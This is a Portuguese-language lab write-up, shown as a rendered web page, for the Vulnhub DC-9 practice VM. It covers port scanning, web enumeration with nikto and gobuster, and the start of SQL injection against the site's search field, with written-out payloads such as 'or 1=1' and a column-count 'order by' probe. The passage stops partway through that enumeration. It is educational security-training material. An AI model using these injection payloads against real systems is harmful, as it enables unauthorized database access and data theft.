-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwriteup-dc9.html
executable file
·386 lines (282 loc) · 78.5 KB
/
writeup-dc9.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text text-anchor=%22middle%22 dominant-baseline=%22middle%22 x=%2250%22 y=%2255%22 font-size=%2280%22>🐞</text></svg>">
<style>
:root {
font-size: 20px;
}
</style>
<title>Writeup - DC9 - OSCP Like VM | www.offensivethink.com</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Writeup - DC9 - OSCP Like VM">
<meta name="description" content="A DC-9 é uma VM do Vulnhub para estudoi para a OSCP.">
<meta property="og:description" content="A DC-9 é uma VM do Vulnhub para estudoi para a OSCP.">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="index.html">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text text-anchor=%22middle%22 dominant-baseline=%22middle%22 x=%2250%22 y=%2255%22 font-size=%2280%22>🐞</text></svg>"></span>
<span>Home</span>
</div>
</a>
<span class="Navbar__Delim">·</span>
<a href="referencia-rapida.html">
<div class="Navbar__Btn">
<span>→ Referência rápida ← </span>
</div>
</a>
<span class="Navbar__Delim">·</span>
<a href="contacts.html">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F12e48681-f6a0-41cb-aa1f-73a46f35c5d3%2FOffensiveThink_Logo_Negative_notion_-_280x280.png?table=block&id=ca933149-5245-4511-a885-9cf5922808e1"></span>
<span>about & contacts</span>
</div>
</a>
<span class="Navbar__Delim">·</span>
<a href="offensivetools.html">
<div class="Navbar__Btn">
<span>Offensive Tools</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Cover">
<img src="https://www.notion.so/images/page-cover/nasa_great_sandy_desert_australia.jpg">
</div>
<div class="Header__Spacer ">
</div>
<h1 class="Header__Title">Writeup - DC9 - OSCP Like VM</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Thu, Jul 30, 2020</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/lfi.html">lfi</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--green">
<a href="tag/fuzz.html">fuzz</a>
</span>
</div>
</header>
<article id="https://www.notion.so/2df49989efea4883a34bc5b0764da5af" class="PageRoot"><div id="https://www.notion.so/46284e20ebb9485c96630f0f47e97210" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Este é um WriteUP que resume mais ou menos todas as tentativas que foram feitas até chegar ao resultado final, mas houveram muitos percalços ao longo do caminho que foram descartados para não deixar o writeup mais longo do que já é. </span></span></p></div><div id="https://www.notion.so/b2d3f61b308a4ea0808c312bd518e89c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/48805a55386c4792a0e3b09da2155884" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Dados da VM</span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/74377935aafe437f8866d88b26d0feca" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">IP: 192.168.1.9 obtido via DHCP</span></span></li><li id="https://www.notion.so/7e2b3c58b9654af394a521af9e30a32d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Página do Criador da VM: </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.five86.com/">https://www.five86.com/</a></span></span></li><li id="https://www.notion.so/913f83368a574a04969ff8b62211315d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Página para Download no Vulnhub: </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.vulnhub.com/entry/dc-9,412/">https://www.vulnhub.com/entry/dc-9,412/</a></span></span></li></ul><div id="https://www.notion.so/1ca2ec5c3709421fbdf864224ebde552" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/59503566140043f781654d2ad9618fe7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Achei um desafio bem interessante, não tão trivial e que foi pensado, segundo o próprio criador, para ser uma máquina que temeta mais a um caso real do que máquinas voltadas para CTFs com "pegadinhas", dicas, etc. </span></span></p></div><h1 id="https://www.notion.so/17f7c56900af40769be84250bdbd9c62" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--1"><a class="Anchor" href="#https://www.notion.so/17f7c56900af40769be84250bdbd9c62"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">SCAN</span></span></h1><pre id="https://www.notion.so/c2ccde62abe0417bb1ae1b1538c60db9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root@kali:/mnt/hgfs/trainnings/OSCPlike/Vulnhub-01-DC9# nmap 192.168.1.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 20:28 EDT
Nmap scan report for 192.168.1.9
Host is up (0.00098s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
</span></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedBg SemanticString__Fragment--BgYellow"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold"><span>22/tcp filtered ssh
80/tcp open http</span></strong></mark></span><span class="SemanticString"><span>
MAC Address: 00:0C:29:0C:D9:D6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.19 seconds
root@kali:/mnt/hgfs/trainnings/OSCPlike/Vulnhub-01-DC9# nmap -sV -O -p80 192.168.1.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 20:28 EDT
Nmap scan report for 192.168.1.9
Host is up (0.0017s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:0C:D9:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.33 seconds</span></span></span></code></pre><div id="https://www.notion.so/21961380c6d94802ae1e12741560f6ea" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Observamos que obtemos uma porta aberta (80) e uma porta filtrada (22), ou seja, provavelmente porta está aberta no servidor mas está limitado o acesso pelo firewall da máquina! </span></span></p></div><div id="https://www.notion.so/c4d5cd4665ab44f8b6805d383cc882c8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><h1 id="https://www.notion.so/7a92d59575754c1394ab4e9b4faf0e8c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--1"><a class="Anchor" href="#https://www.notion.so/7a92d59575754c1394ab4e9b4faf0e8c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">ENUMERATION</span></span></h1><div id="https://www.notion.so/5f6ab2a0c8a84f3c860d5d4df45dd415" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Acessando o endereço no Browser</span></span></p></div><div id="https://www.notion.so/cd83e97fce8f41f79cc45161e849be0e" class="Image Image--PageWidth"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F39aa2ccc-8547-49f7-9af2-9ba4d53a447b%2FUntitled.png?width=840&table=block&id=cd83e97f-ce8f-41f7-9cc4-5161e849be0e"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F39aa2ccc-8547-49f7-9af2-9ba4d53a447b%2FUntitled.png?width=840&table=block&id=cd83e97f-ce8f-41f7-9cc4-5161e849be0e" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/05bf7b30d8334126a684e5f8cc2c72f7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/007da85a2c124de6b294714c3bc6abb3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Observamos que existe uma menção , logo de cara, ao domínio example.com. Inserindo uma entrada no /etc/hosts pois pode ser que o apache esteja funcionando com Virtual Hosts e exiba algum outro site quanto acessado por domínio e não por IP.</span></span></p></div><pre id="https://www.notion.so/18ecc06b21e24b7782504646b3a53ab1" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>echo "192.168.1.9 example.com" >> /etc/hosts</span></span></span></code></pre><div id="https://www.notion.so/e5550188b7734e57b6233a28974ba1fd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Verificamos que o site continua o mesmo acessando através do IP ou do domínio. Virtual Host descartado!</span></span></p></div><div id="https://www.notion.so/2ab53d6c7f0845d385d46ecd079e3935" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/4f13c427b80f48aeafc3ddf99675775d" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F168ac6c0-67f5-485f-9670-897e3fc52dab%2FUntitled.png?width=641&table=block&id=4f13c427-b80f-48ae-afc3-ddf99675775d"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F168ac6c0-67f5-485f-9670-897e3fc52dab%2FUntitled.png?width=641&table=block&id=4f13c427-b80f-48ae-afc3-ddf99675775d" style="width:641px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/d236a540edf04172ae9df92ebb6ddc27" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Vamos usar o goBuster para enumerar alguns diretórios e o nikto para verificar se existe alguma vulnerabilidade associada.</span></span></p></div><h3 id="https://www.notion.so/4d423db70d7e42e08296a5f1156d7299" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--3"><a class="Anchor" href="#https://www.notion.so/4d423db70d7e42e08296a5f1156d7299"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">nikto</span></span></h3><pre id="https://www.notion.so/a4051c0b914741e686df14d0b00fe93b" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root@kali:/mnt/hgfs/trainnings/OSCPlike/Vulnhub-01-DC9# nikto -host 192.168.1.9
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.9
+ Target Hostname: 192.168.1.9
+ Target Port: 80
+ Start Time: 2020-07-04 20:38:07 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7918 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2020-07-04 20:40:10 (GMT-4) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedn</span></span></span></code></pre><h3 id="https://www.notion.so/319b9fbd3321433e847ba19eaae9a881" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--3"><a class="Anchor" href="#https://www.notion.so/319b9fbd3321433e847ba19eaae9a881"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">goBuster</span></span></h3><pre id="https://www.notion.so/d05e0ff961864b1cb790fbfa0fd9b4f9" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root@kali:/mnt/hgfs/trainnings/OSCPlike/Vulnhub-01-DC9# gobuster dir -u http://192.168.1.9:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.9:80/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: jsp,txt,html,php,asp,aspx
[+] Timeout: 10s
===============================================================
2020/07/05 19:53:12 Starting gobuster
===============================================================
/.hta (Status: 403) [Size: 276]
/.hta.jsp (Status: 403) [Size: 276]
/.hta.txt (Status: 403) [Size: 276]
/.hta.html (Status: 403) [Size: 276]
/.hta.php (Status: 403) [Size: 276]
/.hta.asp (Status: 403) [Size: 276]
/.hta.aspx (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/.htpasswd.html (Status: 403) [Size: 276]
/.htpasswd.php (Status: 403) [Size: 276]
/.htpasswd.asp (Status: 403) [Size: 276]
/.htpasswd.aspx (Status: 403) [Size: 276]
/.htpasswd.jsp (Status: 403) [Size: 276]
/.htpasswd.txt (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htaccess.jsp (Status: 403) [Size: 276]
/.htaccess.txt (Status: 403) [Size: 276]
/.htaccess.html (Status: 403) [Size: 276]
/.htaccess.php (Status: 403) [Size: 276]
/.htaccess.asp (Status: 403) [Size: 276]
/.htaccess.aspx (Status: 403) [Size: 276]
/config.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 308]
/display.php (Status: 200) [Size: 2961]
/includes (Status: 301) [Size: 313]
/index.php (Status: 200) [Size: 917]
/index.php (Status: 200) [Size: 917]
/logout.php (Status: 302) [Size: 0]
/manage.php (Status: 200) [Size: 1210]
/results.php (Status: 200) [Size: 1056]
/search.php (Status: 200) [Size: 1091]
/server-status (Status: 403) [Size: 276]
/session.php (Status: 302) [Size: 0]
/welcome.php (Status: 302) [Size: 0]
===============================================================
2020/07/05 19:53:43 Finished
===============================================================</span></span></span></code></pre><div id="https://www.notion.so/170b31e1351d4c268db0ae3f12e715b0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Podemos observar acima que existem alguns diretórios e arquivos encontrados.</span></span></p></div><div id="https://www.notion.so/aab9feb865b9490888f49cbd96f750d5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Ao acessar o welcome.php observamos que ele faz um redirect para o manage.php, já disponibiliza outras opções no menu, como o Add Record e apresenta uma mensagem no rodapé de </span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">File does not Exist. </strong></span><span class="SemanticString"><mark class="SemanticString__Fragment SemanticString__Fragment--HighlightedColor SemanticString__Fragment--ColorRed"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Seria um LFI ? </strong></mark></span></span></p></div><div id="https://www.notion.so/3fb5e3451bd5433b983e81d1444931ce" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/6fef2175ffc7427e962e97d748aeaa84" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F68927bf7-b7c9-44a1-a9aa-cf36387910c3%2FUntitled.png?width=689&table=block&id=6fef2175-ffc7-427e-962e-97d748aeaa84"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F68927bf7-b7c9-44a1-a9aa-cf36387910c3%2FUntitled.png?width=689&table=block&id=6fef2175-ffc7-427e-962e-97d748aeaa84" style="width:689px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/860f7bcc38644881a16edcccd924db0d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Parece que ao acessar o welcome.php diretamente, sem um login prévio, fez o site autenticar como admin mas não completamente, pois a funcionalidade de Add Record, no menu, não funciona corretamente. </span></span></p></div><div id="https://www.notion.so/31318e4ea2f14dffaf3b6e05dd9b4d13" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">O site apresenta uma funcionalidade de search. Vamos tentar verificar se possui um SQLi. </span></span></p></div><div id="https://www.notion.so/bfaaeb72b9b14b22b900774ae38fde36" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/b41f0dd166b6407c9297f21bd49fa82e" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb6935c89-3472-40fb-b932-991efc4d5b28%2FUntitled.png?width=386&table=block&id=b41f0dd1-66b6-407c-9297-f21bd49fa82e"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb6935c89-3472-40fb-b932-991efc4d5b28%2FUntitled.png?width=386&table=block&id=b41f0dd1-66b6-407c-9297-f21bd49fa82e" style="width:386px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">ataque</span></span></figcaption></figure></div><div id="https://www.notion.so/4ec3ad02623b4940bf5a080550e09271" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fccd9fa0a-5374-4f93-a3c9-04f6c8f23b3c%2FUntitled.png?width=247&table=block&id=4ec3ad02-623b-4940-bf5a-080550e09271"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fccd9fa0a-5374-4f93-a3c9-04f6c8f23b3c%2FUntitled.png?width=247&table=block&id=4ec3ad02-623b-4940-bf5a-080550e09271" style="width:247px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">resultado</span></span></figcaption></figure></div><div id="https://www.notion.so/b6c01f16205548b88db6b4cbc8f9128b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/3087f99e33b54356a66bc3ec741e8dce" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Aparentemente, pelo resultado, nos levaria a acreditar que a aplicação está tratando </span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">erros</strong></span><span class="SemanticString"> de SQLi, já que o código acima deveria gerar um erro uma vez que geraria um SQL mais ou menos do tipo: </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SELECT campo FROM tabela WHERE campo = '' 1=1 — - </code></span><span class="SemanticString">, o que daria erro por falta de um operador lógico no WHERE.</span></span></p></div><div id="https://www.notion.so/132bd08034134880b65237c96b809373" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Vamos tentar mais uma vez agora com um operador lógico : </span></span></p></div><div id="https://www.notion.so/c99cf06a6c0f4c3198f6e62e14ebd914" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/ebefaa0a3d0446cf8647f91f38c68ff6" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc66a798b-bbf6-4b4d-804b-816646dee495%2FUntitled.png?width=402&table=block&id=ebefaa0a-3d04-46cf-8647-f91f38c68ff6"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc66a798b-bbf6-4b4d-804b-816646dee495%2FUntitled.png?width=402&table=block&id=ebefaa0a-3d04-46cf-8647-f91f38c68ff6" style="width:402px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">ataque</span></span></figcaption></figure></div><div id="https://www.notion.so/59f07ae88785412db5c092e54f89bb3e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/c98a273c63e24860bfe09fc6bc602950" class="Image Image--Normal"><figure><a href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fac2bfdda-cee5-486d-bba4-63096b51904f%2FUntitled.png?width=394&table=block&id=c98a273c-63e2-4860-bfe0-9fc6bc602950"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fac2bfdda-cee5-486d-bba4-63096b51904f%2FUntitled.png?width=394&table=block&id=c98a273c-63e2-4860-bfe0-9fc6bc602950" style="width:394px"/></a><figcaption><span class="SemanticStringArray"><span class="SemanticString">resultado</span></span></figcaption></figure></div><div id="https://www.notion.so/5d417edcff29467583b1726d223d45a6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/b2141668170d4526ac6bd928522198e0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><div id="https://www.notion.so/fe58d05ddb6340c88e07d2a670e7c233" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Observarmos que a aplicação respondeu ao SQLi mostrando todos o conteúdo da tabela devido a condição </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">or 1=1 </code></span><span class="SemanticString">. Vamos então enumerar os bancos, tabelas, campos e conteúdos. Foram utilizados os seguintes comandos </span><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">inseridos no campo search</strong></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/6b6775b7bff24654bf352394d7b63d4c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div><pre id="https://www.notion.so/465d347d6fb24931ad5053fcfeec876a" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">1</span> <span class="token operator">-</span> Quantidade de Colunas: Ordenar até não obter resultado<span class="token operator">!</span>
tom' <span class="token operator">or</span> <span class="token number">1</span><span class="token operator">=</span><span class="token number">1</span> <span class="token keyword">order</span> <span class="token keyword">by</span> <span class="token number">7</span> <span class="token comment">-- - <- Não retorna nenhum resultado, logo, são 6 colunas </span></span></span></span></code></pre><pre id="https://www.notion.so/ee48159dbb4943809e43994a2a0136ce" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token number">2</span> <span class="token operator">-</span> Verificar em que campos temos retorno visual
